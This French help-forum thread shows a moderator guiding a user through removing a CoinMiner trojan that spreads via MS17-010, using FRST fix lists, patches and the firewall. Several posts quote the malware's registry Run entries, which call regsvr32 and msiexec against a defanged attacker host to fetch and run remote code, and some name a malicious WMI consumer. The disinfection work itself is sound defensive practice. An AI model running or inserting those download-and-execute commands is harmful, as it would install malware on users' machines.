BAT/CoinMiner.Ru Trojan
Fermé
webdev
-
28 août 2017 à 18:21
webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017 - 8 sept. 2017 à 11:02
webdoweb Messages postés 32 Date d'inscription vendredi 8 janvier 2010 Statut Membre Dernière intervention 8 septembre 2017 - 8 sept. 2017 à 11:02
A voir également:
- BAT/CoinMiner.Ru Trojan
- Fichier bat - Guide
- Trojan remover - Télécharger - Antivirus & Antimalwares
- Bat to exe converter - Télécharger - Édition & Programmation
- Csrss.exe trojan - Forum Virus
- Trojan win32 - Forum Virus
25 réponses
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
28 août 2017 à 18:34
28 août 2017 à 18:34
Salut,
Ca fait penser à des miner qui vont par la vulnérabilité MS17-010
https://forum.malekal.com/viewtopic.php?t=57653
Pour voir :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST,
Attendre la fin du scan, un message indique que l'analyse est terminée.
Trois rapports FRST seront générés :
Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Ca fait penser à des miner qui vont par la vulnérabilité MS17-010
https://forum.malekal.com/viewtopic.php?t=57653
Pour voir :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST,
Attendre la fin du scan, un message indique que l'analyse est terminée.
Trois rapports FRST seront générés :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
webdoweb
Messages postés
32
Date d'inscription
vendredi 8 janvier 2010
Statut
Membre
Dernière intervention
8 septembre 2017
28 août 2017 à 18:59
28 août 2017 à 18:59
Merci pour votre réponse,
voila les rapports de FRST:
https://pjjoint.malekal.com/files.php?id=FRST_20170828_r8j8w7u11y5
https://pjjoint.malekal.com/files.php?id=20170828_m11m10s5m13p15
https://pjjoint.malekal.com/files.php?id=20170828_b9s12o14j9s10
voila les rapports de FRST:
https://pjjoint.malekal.com/files.php?id=FRST_20170828_r8j8w7u11y5
https://pjjoint.malekal.com/files.php?id=20170828_m11m10s5m13p15
https://pjjoint.malekal.com/files.php?id=20170828_b9s12o14j9s10
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
Modifié le 28 août 2017 à 19:05
Modifié le 28 août 2017 à 19:05
bingo, c'est bien un miner qui va par la vulnérabilité mentionnée, on retrouve le même type d'adresse : js.mykings.top
Le bon côté, c'est que les .Bat désactive SMB et parfois ajoute des règles sur le Fw de Windows pour te protéger =)
Toutefois, il faudrait installer ces mises à jour manuellement pour être sûr que la machine soit safe.
Je te donne la correction FRST, NOD32 devrait dégager les trucs qui ont été mis dans debug et wbem.
C'est souvent bien détecté.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
Veuillez appuyer sur une touche pour continuer la désinfection...
Le bon côté, c'est que les .Bat désactive SMB et parfois ajoute des règles sur le Fw de Windows pour te protéger =)
Toutefois, il faudrait installer ces mises à jour manuellement pour être sûr que la machine soit safe.
Je te donne la correction FRST, NOD32 devrait dégager les trucs qui ont été mis dans debug et wbem.
C'est souvent bien détecté.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION [Pays - ]
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION [Pays - ]
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
Veuillez appuyer sur une touche pour continuer la désinfection...
Voila merci:
Résultats de correction de Farbar Recovery Scan Tool (x86) Version: 20-08-2017
Exécuté par Ahmed (28-08-2017 18:10:31) Run:1
Exécuté depuis C:\Documents and Settings\Ahmed\Bureau
Profils chargés: Ahmed (Profils disponibles: Ahmed & Administrateur)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION [Pays - ]
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION [Pays - ]
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\start => valeur supprimé(es) avec succès
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\start1 => valeur supprimé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
========= RemoveProxy: =========
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => clé supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Policies\Microsoft\Internet Explorer => clé supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 0 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache => 26494 B
Java, Flash, Steam htmlcache => 7530 B
Windows/system/dllcache/drivers => 177655280 B
Edge => 0 B
Chrome => 231449882 B
Firefox => 385544590 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Documents and Settings => 0 B
Default User => 49780 B
All Users => 0 B
systemprofile => 88801617 B
LocalService => 10274610 B
NetworkService => 1564130 B
Ahmed => 59560319 B
Administrateur => 145524 B
RecycleBin => 0 B
EmptyTemp: => 910.8 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
Résultats de correction de Farbar Recovery Scan Tool (x86) Version: 20-08-2017
Exécuté par Ahmed (28-08-2017 18:10:31) Run:1
Exécuté depuis C:\Documents and Settings\Ahmed\Bureau
Profils chargés: Ahmed (Profils disponibles: Ahmed & Administrateur)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION [Pays - ]
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION [Pays - ]
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\start => valeur supprimé(es) avec succès
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\start1 => valeur supprimé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
========= RemoveProxy: =========
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => clé supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Policies\Microsoft\Internet Explorer => clé supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 0 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache => 26494 B
Java, Flash, Steam htmlcache => 7530 B
Windows/system/dllcache/drivers => 177655280 B
Edge => 0 B
Chrome => 231449882 B
Firefox => 385544590 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Documents and Settings => 0 B
Default User => 49780 B
All Users => 0 B
systemprofile => 88801617 B
LocalService => 10274610 B
NetworkService => 1564130 B
Ahmed => 59560319 B
Administrateur => 145524 B
RecycleBin => 0 B
EmptyTemp: => 910.8 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
Fin de Fixlog 18:12:22
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
29 août 2017 à 09:27
29 août 2017 à 09:27
Termine par un nettoyage NOD32.
Installe bien les mises à jour.
Installe bien les mises à jour.
webdoweb
Messages postés
32
Date d'inscription
vendredi 8 janvier 2010
Statut
Membre
Dernière intervention
8 septembre 2017
29 août 2017 à 10:46
29 août 2017 à 10:46
Merci pour votre réponse,
je vais lancer Nod32, juste pour info ce matin lors de démarrage de PC j'ai eu l'info de Nod32 BAT/CoinMiner.Ru cleaned by deleting
c'est que ce Trojan est toujours là
je vais lancer Nod32, juste pour info ce matin lors de démarrage de PC j'ai eu l'info de Nod32 BAT/CoinMiner.Ru cleaned by deleting
c'est que ce Trojan est toujours là
webdoweb
Messages postés
32
Date d'inscription
vendredi 8 janvier 2010
Statut
Membre
Dernière intervention
8 septembre 2017
29 août 2017 à 17:50
29 août 2017 à 17:50
Salut,
Nod32 n'a rien trouvé en scan, et le popup (BAT/CoinMiner.Ru cleaned by deleting) s'affiche de temps en temps. comme quoi le Trojan est toujours présent :(
Nod32 n'a rien trouvé en scan, et le popup (BAT/CoinMiner.Ru cleaned by deleting) s'affiche de temps en temps. comme quoi le Trojan est toujours présent :(
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
29 août 2017 à 18:53
29 août 2017 à 18:53
Tu as quoi comme fichiers dans ces dossiers ?
c:\windows\debug\
c:\windows\system32\wbem\
Tu as installé la mise à jour indiquée ?
c:\windows\debug\
c:\windows\system32\wbem\
Tu as installé la mise à jour indiquée ?
webdoweb
Messages postés
32
Date d'inscription
vendredi 8 janvier 2010
Statut
Membre
Dernière intervention
8 septembre 2017
29 août 2017 à 19:08
29 août 2017 à 19:08
Oui j'ai installer les mise à jour de nod32
c:\windows\debug\ usermode
c:\windows\debug\ WPD
c:\windows\debug\ blastcln.txt
c:\windows\debug\ mrt.txt
c:\windows\debug\ netsetup.txt
c:\windows\debug\ password.txt
et dans wbem il y a 7 dossiers et 150 fichiers
voila
c:\windows\debug\ usermode
c:\windows\debug\ WPD
c:\windows\debug\ blastcln.txt
c:\windows\debug\ mrt.txt
c:\windows\debug\ netsetup.txt
c:\windows\debug\ password.txt
et dans wbem il y a 7 dossiers et 150 fichiers
voila
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
29 août 2017 à 19:12
29 août 2017 à 19:12
Je parlais de cette mise à jour en fait : https://www.microsoft.com/fr-FR/download/details.aspx?id=55245
dans c:\windows\system32\wbem\ , tu as des .exe ?
dans c:\windows\system32\wbem\ , tu as des .exe ?
webdoweb
Messages postés
32
Date d'inscription
vendredi 8 janvier 2010
Statut
Membre
Dernière intervention
8 septembre 2017
29 août 2017 à 19:12
29 août 2017 à 19:12
Que pense tu de cette ligne dans ADDITION.txt :
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
webdoweb
Messages postés
32
Date d'inscription
vendredi 8 janvier 2010
Statut
Membre
Dernière intervention
8 septembre 2017
29 août 2017 à 19:17
29 août 2017 à 19:17
oui y a des .exe dans wbem
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
29 août 2017 à 19:20
29 août 2017 à 19:20
comme ?
Installe la mise à jour, on va virer le WMI.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
Installe la mise à jour, on va virer le WMI.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION [Pays - ]
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION [Pays - ]
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
webdoweb
Messages postés
32
Date d'inscription
vendredi 8 janvier 2010
Statut
Membre
Dernière intervention
8 septembre 2017
29 août 2017 à 19:29
29 août 2017 à 19:29
Comme SCRCONS.exe c'est ce lui qui crée le c2.bat dans windows/debug
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
29 août 2017 à 19:31
29 août 2017 à 19:31
il est légitime ce fichier, ça doit être la ligne wmi qui en est la source.
webdoweb
Messages postés
32
Date d'inscription
vendredi 8 janvier 2010
Statut
Membre
Dernière intervention
8 septembre 2017
29 août 2017 à 19:37
29 août 2017 à 19:37
Résultats de correction de Farbar Recovery Scan Tool (x86) Version: 20-08-2017
Exécuté par Ahmed (29-08-2017 18:30:19) Run:2
Exécuté depuis C:\Documents and Settings\Ahmed\Bureau
Profils chargés: Ahmed (Profils disponibles: Ahmed & Administrateur)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION [Pays - ]
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION [Pays - ]
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\start => valeur non trouvé(e).
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\start1 => valeur non trouvé(e).
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION => non trouvé(e)
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 0 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache => 8192 B
Java, Flash, Steam htmlcache => 492 B
Windows/system/dllcache/drivers => 2073 B
Edge => 0 B
Chrome => 68328018 B
Firefox => 81625769 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Documents and Settings => 0 B
Default User => 0 B
All Users => 0 B
systemprofile => 66228 B
LocalService => 66708 B
NetworkService => 692 B
Ahmed => 147975 B
Administrateur => 0 B
RecycleBin => 0 B
EmptyTemp: => 143.3 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
Exécuté par Ahmed (29-08-2017 18:30:19) Run:2
Exécuté depuis C:\Documents and Settings\Ahmed\Bureau
Profils chargés: Ahmed (Profils disponibles: Ahmed & Administrateur)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION [Pays - ]
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION [Pays - ]
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\start => valeur non trouvé(e).
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\start1 => valeur non trouvé(e).
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION => non trouvé(e)
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1757981266-1326574676-1801674531-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 0 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache => 8192 B
Java, Flash, Steam htmlcache => 492 B
Windows/system/dllcache/drivers => 2073 B
Edge => 0 B
Chrome => 68328018 B
Firefox => 81625769 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Documents and Settings => 0 B
Default User => 0 B
All Users => 0 B
systemprofile => 66228 B
LocalService => 66708 B
NetworkService => 692 B
Ahmed => 147975 B
Administrateur => 0 B
RecycleBin => 0 B
EmptyTemp: => 143.3 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
Fin de Fixlog 18:30:48
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
30 août 2017 à 11:54
30 août 2017 à 11:54
cette suppression améliore les choses ?
webdoweb
Messages postés
32
Date d'inscription
vendredi 8 janvier 2010
Statut
Membre
Dernière intervention
8 septembre 2017
30 août 2017 à 12:08
30 août 2017 à 12:08
Oui, pour le moment je n'ai pas eu le popup (cleaned by deleting de nod32) j'espère qu'il est supprimé.
Merci bcp
Merci bcp
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
30 août 2017 à 13:11
30 août 2017 à 13:11
super =)
webdoweb
Messages postés
32
Date d'inscription
vendredi 8 janvier 2010
Statut
Membre
Dernière intervention
8 septembre 2017
5 sept. 2017 à 11:44
5 sept. 2017 à 11:44
Bonjour,
Je reviens vers vous :(
j'ai eu 2 popup nod32 (BAT/CoinMiner.RU trojan cleaned by deleting) pour :
- C:\WINDOWS\DEBUG\c2.bat
- C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\8Y1GZ2V2\close2[1].bat
voici la note que j'ai trouvé sur nod32:
BAT/CoinMiner.RU trojan;cleaned by deleting;AUTORITE NT\SYSTEM;Event occurred on a new file created by the application: C:\WINDOWS\system32\wbem\scrcons.exe (BFDF2820DF45266AA1D0EB887E84FE770E5F7452).;BEC02C55C98612EE716BB5956F68E0DD27CF0AFC;05/09/2017 10:16:42
Merci d'avance
Je reviens vers vous :(
j'ai eu 2 popup nod32 (BAT/CoinMiner.RU trojan cleaned by deleting) pour :
- C:\WINDOWS\DEBUG\c2.bat
- C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\8Y1GZ2V2\close2[1].bat
voici la note que j'ai trouvé sur nod32:
BAT/CoinMiner.RU trojan;cleaned by deleting;AUTORITE NT\SYSTEM;Event occurred on a new file created by the application: C:\WINDOWS\system32\wbem\scrcons.exe (BFDF2820DF45266AA1D0EB887E84FE770E5F7452).;BEC02C55C98612EE716BB5956F68E0DD27CF0AFC;05/09/2017 10:16:42
Merci d'avance
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
Modifié le 5 sept. 2017 à 12:25
Modifié le 5 sept. 2017 à 12:25
Salut,
Tu es vraiment certains d'avoir installé les mises à jour demandés?
Le pare-feu Windows fonctionne ?
Tu es vraiment certains d'avoir installé les mises à jour demandés?
Le pare-feu Windows fonctionne ?
webdoweb
Messages postés
32
Date d'inscription
vendredi 8 janvier 2010
Statut
Membre
Dernière intervention
8 septembre 2017
5 sept. 2017 à 12:31
5 sept. 2017 à 12:31
Oui, j'ai installé les mises à jour demandés.
le pare-feu a été désactivé, je viens de l'activer maintenant
le pare-feu a été désactivé, je viens de l'activer maintenant
webdoweb
Messages postés
32
Date d'inscription
vendredi 8 janvier 2010
Statut
Membre
Dernière intervention
8 septembre 2017
5 sept. 2017 à 12:34
5 sept. 2017 à 12:34
Vous voulez que je refais FRST, et post les rapports?
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
5 sept. 2017 à 13:05
5 sept. 2017 à 13:05
Tu peux vas y.
webdoweb
Messages postés
32
Date d'inscription
vendredi 8 janvier 2010
Statut
Membre
Dernière intervention
8 septembre 2017
5 sept. 2017 à 13:10
5 sept. 2017 à 13:10
en attendant tu peux voir ce lien ci-dessous, je vois que c'est WMI qui est le responsable de cette infection en relation avec scrcons.exe :
https://forum.eset.com/topic/12134-wmi-infections/
https://forum.eset.com/topic/12134-wmi-infections/
webdoweb
Messages postés
32
Date d'inscription
vendredi 8 janvier 2010
Statut
Membre
Dernière intervention
8 septembre 2017
5 sept. 2017 à 13:16
5 sept. 2017 à 13:16
FRST rapport : https://pjjoint.malekal.com/files.php?id=FRST_20170905_o14w15x5n8k14
Addition rapport: https://pjjoint.malekal.com/files.php?id=20170905_s5g10m7t12l7
Addition rapport: https://pjjoint.malekal.com/files.php?id=20170905_s5g10m7t12l7
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
5 sept. 2017 à 13:26
5 sept. 2017 à 13:26
L'entrée WMI est revenue.
C'est un portable ? tu le branches à différents endroits ?
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
C'est un portable ? tu le branches à différents endroits ?
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
C:\WINDOWS\DEBUG\c2.bat
C:\WINDOWS\system32\wbem\scrcons.exe
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
webdoweb
Messages postés
32
Date d'inscription
vendredi 8 janvier 2010
Statut
Membre
Dernière intervention
8 septembre 2017
5 sept. 2017 à 13:31
5 sept. 2017 à 13:31
portable? tu veux dire téléphone mobile, oui j'ai un samsung que je charge par ce PC et non pas sur d'autres
et c'est à cause de téléphone?
et c'est à cause de téléphone?
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
5 sept. 2017 à 14:26
5 sept. 2017 à 14:26
non si c'est un ordinateur fixe de bureau ou un ordinateur portable.
